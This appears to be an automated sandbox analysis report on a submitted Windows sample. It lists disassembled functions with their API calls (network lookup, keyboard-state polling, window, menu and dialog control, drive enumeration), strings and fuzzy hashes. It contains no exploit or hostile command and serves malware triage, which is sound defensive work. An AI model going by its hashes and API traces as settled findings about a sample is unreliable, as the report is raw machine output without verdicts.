Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 183ac88af48d5aa5f1296787c2693ee1bf066fb6561f20f445b6c98501171a3b
Instruction ID: 0063f39204ae503dc8f950a1e0f7f1be635a00bf4f76b92224c03d30341e13cd
Opcode Fuzzy Hash: 183ac88af48d5aa5f1296787c2693ee1bf066fb6561f20f445b6c98501171a3b
Instruction Fuzzy Hash: D31182216A01AD79D720A6A1CC9AEFFBBFCEFD1B04F8004EDB415A30E1DEA05D45C5A5

Function 00B748F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B7490E
gethostname.WSOCK32(?,00000100), ref: 00B74928
gethostbyname.WSOCK32(?), ref: 00B74935
_wcscpy.LIBCMT ref: 00B7495D
_memmove.LIBCMT ref: 00B74970
inet_ntoa.WSOCK32(?), ref: 00B7497B
_strcat.LIBCMT ref: 00B74989
_wcscpy.LIBCMT ref: 00B749A0
WSACleanup.WSOCK32 ref: 00B749AE
_wcscpy.LIBCMT ref: 00B749BC

Strings

0.0.0.0, xrefs: 00B74957

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: db6c8cb3d7021e8085292a8296861da18708307a9130c01b4e8d4a02375fd7bc
Instruction ID: acfda1041545b6f78aa7b3388cb30da7f5d4eee6241a0ffb301a64c0983e4151
Opcode Fuzzy Hash: db6c8cb3d7021e8085292a8296861da18708307a9130c01b4e8d4a02375fd7bc
Instruction Fuzzy Hash: FE110231A04115AFCB24AB64ED4AEEB77FCDB00721F1081F6F518D20A1EFB09E818661

Function 00B75217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B7521C

Part of subcall function 00B30719: timeGetTime.WINMM(?,75C0B400,00B20FF9), ref: 00B3071D

Sleep.KERNEL32(0000000A), ref: 00B75248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00B7526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B7528E
SetActiveWindow.USER32 ref: 00B752AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B752BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B752DA
Sleep.KERNEL32(000000FA), ref: 00B752E5
IsWindow.USER32 ref: 00B752F1
EndDialog.USER32(00000000), ref: 00B75302

Strings

BUTTON, xrefs: 00B75280

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 9cbcdf49783fd76413e134105a6f371032a3d20448fdaa44a91c76620e737f22
Instruction ID: 23c8a2e372255ef7334eb278e4025b39775111746de8610d62447aab6569cf26
Opcode Fuzzy Hash: 9cbcdf49783fd76413e134105a6f371032a3d20448fdaa44a91c76620e737f22
Instruction Fuzzy Hash: 5921C570145705AFE7105B60EDA8B757BA9EB1435AF0144AAF41AC3171EFA19C10D732

Function 00B7D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

CoInitialize.OLE32(00000000), ref: 00B7D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B7D8E8
SHGetDesktopFolder.SHELL32(?), ref: 00B7D8FC
CoCreateInstance.OLE32(00BA2D7C,00000000,00000001,00BCA89C,?), ref: 00B7D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B7D9B7
CoTaskMemFree.OLE32(?,?), ref: 00B7DA0F
_memset.LIBCMT ref: 00B7DA4C
SHBrowseForFolderW.SHELL32(?), ref: 00B7DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B7DAAB
CoTaskMemFree.OLE32(00000000), ref: 00B7DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B7DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00B7DAEB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 70764bf0cfa84c8210c8cd2bf6b0f38f7191bf1540efc7ab031613e549f45401
Instruction ID: 329dd13aa71edaec32bf5e87c26dc7651eb373b9e9fc3a61e9de616d5f00dbd1
Opcode Fuzzy Hash: 70764bf0cfa84c8210c8cd2bf6b0f38f7191bf1540efc7ab031613e549f45401
Instruction Fuzzy Hash: A1B10C75A00109AFDB04DFA4C889EAEBBF9FF48354B1484A9F519EB261DB30ED41CB50

Function 00B7052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B705A7
SetKeyboardState.USER32(?), ref: 00B70612
GetAsyncKeyState.USER32(000000A0), ref: 00B70632
GetKeyState.USER32(000000A0), ref: 00B70649
GetAsyncKeyState.USER32(000000A1), ref: 00B70678
GetKeyState.USER32(000000A1), ref: 00B70689
GetAsyncKeyState.USER32(00000011), ref: 00B706B5
GetKeyState.USER32(00000011), ref: 00B706C3
GetAsyncKeyState.USER32(00000012), ref: 00B706EC
GetKeyState.USER32(00000012), ref: 00B706FA
GetAsyncKeyState.USER32(0000005B), ref: 00B70723
GetKeyState.USER32(0000005B), ref: 00B70731

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 765984f9fd97c89b3f3361c683e6f55175630440e0f762f20d56154a2a7e35f7
Instruction ID: c33b83c8f1790700baa749c81f29eed7b9f24cd03fb169b615b1925494b643c7
Opcode Fuzzy Hash: 765984f9fd97c89b3f3361c683e6f55175630440e0f762f20d56154a2a7e35f7
Instruction Fuzzy Hash: 9751F920A1478459FB34FBA488547EABFF4DF11380F08C5DB95DA5A1C2DA64DB4CCB61

Function 00B6C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00B6C746
GetWindowRect.USER32(00000000,?), ref: 00B6C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B6C7B6
GetDlgItem.USER32(?,00000002), ref: 00B6C7C1
GetWindowRect.USER32(00000000,?), ref: 00B6C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B6C827
GetDlgItem.USER32(?,000003E9), ref: 00B6C835
GetWindowRect.USER32(00000000,?), ref: 00B6C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B6C889
GetDlgItem.USER32(?,000003EA), ref: 00B6C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B6C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00B6C8C1

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: dfac35fb9a481326168bd2509edc85ec90aec9fd3bb9efd427b84878d51b172e
Instruction ID: 4a8869939515eeff5b783a4e05adecfee5dea697bf4dff29cfbdbfbc55fa842f
Opcode Fuzzy Hash: dfac35fb9a481326168bd2509edc85ec90aec9fd3bb9efd427b84878d51b172e
Instruction Fuzzy Hash: FC513E71B00205AFDB18CFA9DD89ABEBBBAEB88311F14816DF516D7290DB749D40CB50

Function 00B1201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B12036,?,00000000,?,?,?,?,00B116CB,00000000,?), ref: 00B11B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B120D3
KillTimer.USER32(-00000001,?,?,?,?,00B116CB,00000000,?,?,00B11AE2,?,?), ref: 00B1216E
DestroyAcceleratorTable.USER32(00000000), ref: 00B4BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B116CB,00000000,?,?,00B11AE2,?,?), ref: 00B4BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B116CB,00000000,?,?,00B11AE2,?,?), ref: 00B4BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B116CB,00000000,?,?,00B11AE2,?,?), ref: 00B4BF5A
DeleteObject.GDI32(00000000), ref: 00B4BF6C

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: be57a547e3e67647808cb4844d328786b9fd1b96941856d955835298f03b1e4e
Instruction ID: a78ca017c99f626643c2ca517bae9987212d34b6a9637047599b065f153d9789
Opcode Fuzzy Hash: be57a547e3e67647808cb4844d328786b9fd1b96941856d955835298f03b1e4e
Instruction Fuzzy Hash: 9B61CC31101601EFCB25DF14CD98B6AB7F1FB04312F5045AAE64697A60CB76ADA0EF40

Function 00B121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00B125DB: GetWindowLongW.USER32(?,000000EB), ref: 00B125EC

GetSysColor.USER32(0000000F), ref: 00B121D3

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 03ab9b245bd4d352069bd7e9c13b463cdeac04fab95e03c8cdd4750255f26c5f
Instruction ID: e12ef57afaa2ab4d2fb9d7f0466f84b54233b4330704553742ebf540f366c6df
Opcode Fuzzy Hash: 03ab9b245bd4d352069bd7e9c13b463cdeac04fab95e03c8cdd4750255f26c5f
Instruction Fuzzy Hash: BD41A3311001509BDB255F28DC88BFD3BA5EB06731F5842A6FD65DB1E2CB318D92DB91

Function 00B7AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00B9F910), ref: 00B7AB76
GetDriveTypeW.KERNEL32(00000061,00BCA620,00000061), ref: 00B7AC40
_wcscpy.LIBCMT ref: 00B7AC6A

Strings

ramdisk, xrefs: 00B7ABEA
removable, xrefs: 00B7ABA8
unknown, xrefs: 00B7AC01
network, xrefs: 00B7ABD4
cdrom, xrefs: 00B7AB92
fixed, xrefs: 00B7ABBE
all, xrefs: 00B7AB7C

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 864c92c4a5603f240034642936e9dce4eb3989a64e9c8e8d084d144e01746bec
Instruction ID: 4108b0d73b8d90bc489c1f2a6384ed26c37dc3fb1e35c30083f023a75daefa74
Opcode Fuzzy Hash: 864c92c4a5603f240034642936e9dce4eb3989a64e9c8e8d084d144e01746bec
Instruction Fuzzy Hash: 1F51AF31158345ABC720EF14C891EAFB7E5EF84304F5488ADF4AA972A2DB31DD49CA53

Function 00B19997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00B199C2
__swprintf.LIBCMT ref: 00B19A0C
__i64tow.LIBCMT ref: 00B4FA0F

Strings

0x%p, xrefs: 00B4F9F1
%.15g, xrefs: 00B19A06
False, xrefs: 00B4F9D7
True, xrefs: 00B4F9D0

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 77fbde3af1de3c85d6de295ab427e23c5a1ba68e9924bed606cf2f2e6a98efac
Instruction ID: ce0056f0c59128112fa06b1e4b9c04f6dd16ec8a9278b51fbe1b3bb050ba02c5
Opcode Fuzzy Hash: 77fbde3af1de3c85d6de295ab427e23c5a1ba68e9924bed606cf2f2e6a98efac
Instruction Fuzzy Hash: 7241B471614206AFDB24AF38D892FBA73E8EF44300F7448EEE549D7291EA71D9819B11

Function 00B973C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B973D9
CreateMenu.USER32 ref: 00B973F4
SetMenu.USER32(?,00000000), ref: 00B97403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B97490
IsMenu.USER32(?), ref: 00B974A6
CreatePopupMenu.USER32 ref: 00B974B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B974DD
DrawMenuBar.USER32 ref: 00B974E5

Strings

F, xrefs: 00B974D1
0, xrefs: 00B973CF

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 6fbb7877a1d49818ef55536589c9a6d77646486134296edc13caaa2d03bdad49
Instruction ID: 6a9e15f92f6d67a28b5ac0622afe123038dc8db0b0dd509f3ef63f84f2f3ed0d
Opcode Fuzzy Hash: 6fbb7877a1d49818ef55536589c9a6d77646486134296edc13caaa2d03bdad49
Instruction Fuzzy Hash: 4E416674A11209EFDF20DF64D984BAABBF9FF49310F24406AE90597361DB31AD10CB90

Function 00B9772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B977CD
CreateCompatibleDC.GDI32(00000000), ref: 00B977D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B977E7
SelectObject.GDI32(00000000,00000000), ref: 00B977EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B977FA
DeleteDC.GDI32(00000000), ref: 00B97803
GetWindowLongW.USER32(?,000000EC), ref: 00B9780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B97821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B9782D

Strings

static, xrefs: 00B97765

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: b2dea3a98e23535f6d258dc79b6e1334bc21f58004b50bb4de964e421726c3bd
Instruction ID: d4957d371cef53c42d60bc1b563842ac443b24b2bae51772975b4fcc8cc23469
Opcode Fuzzy Hash: b2dea3a98e23535f6d258dc79b6e1334bc21f58004b50bb4de964e421726c3bd
Instruction Fuzzy Hash: 65318D31115216ABDF119FA4DC49FEA3BA9FF09330F110275FA15E60A0CB35D821DBA4

Function 00B37040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B3707B

Part of subcall function 00B38D68: __getptd_noexit.LIBCMT ref: 00B38D68

__gmtime64_s.LIBCMT ref: 00B37114
__gmtime64_s.LIBCMT ref: 00B3714A
__gmtime64_s.LIBCMT ref: 00B37167
__allrem.LIBCMT ref: 00B371BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B371D9
__allrem.LIBCMT ref: 00B371F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B3720E
__allrem.LIBCMT ref: 00B37225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B37243
__invoke_watson.LIBCMT ref: 00B372B4

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: c6e27cbf1db92dd20cd690779dcb8a76c225c02dea41539931592262210c2569
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: D371EAB1A44716ABD724DE79CC81B5BB3E4EF15720F2442AAF814E7681EF70DA409790

Function 00B72A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72A31
GetMenuItemInfoW.USER32(00BD6890,000000FF,00000000,00000030), ref: 00B72A92
SetMenuItemInfoW.USER32(00BD6890,00000004,00000000,00000030), ref: 00B72AC8
Sleep.KERNEL32(000001F4), ref: 00B72ADA
GetMenuItemCount.USER32(?), ref: 00B72B1E
GetMenuItemID.USER32(?,00000000), ref: 00B72B3A
GetMenuItemID.USER32(?,-00000001), ref: 00B72B64
GetMenuItemID.USER32(?,?), ref: 00B72BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B72BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B72C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B72C24

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b597e45f4ad2f6338ec95636871b616410fc64dc66e79946e439f75354c155d4
Instruction ID: 883003b9f2785d0b7a6fb9b29a1d6eea05fce310d24acfbf54fc49ff07a037f6
Opcode Fuzzy Hash: b597e45f4ad2f6338ec95636871b616410fc64dc66e79946e439f75354c155d4
Instruction Fuzzy Hash: 2861B1B0900249AFDF11CF64CD88EBEBBF8EB15314F14849AE865A7251DB31AD05DB21

Function 00B97192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B97214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B97217
GetWindowLongW.USER32(?,000000F0), ref: 00B9723B
_memset.LIBCMT ref: 00B9724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B9725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B972D6

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: d5c8db32134557fbc681a4dcc3fe1a006a6c234bc98028db69f89304ffe36051
Instruction ID: 5f84c9fae4e5c02cce408866e797c970151d422fc1c2addd0af175e01414df4f
Opcode Fuzzy Hash: d5c8db32134557fbc681a4dcc3fe1a006a6c234bc98028db69f89304ffe36051
Instruction Fuzzy Hash: 1F617E75A44208AFDB10DFA4CC81EEE77F8EB09710F1401AAFA14E72A1DB71AD45DB64

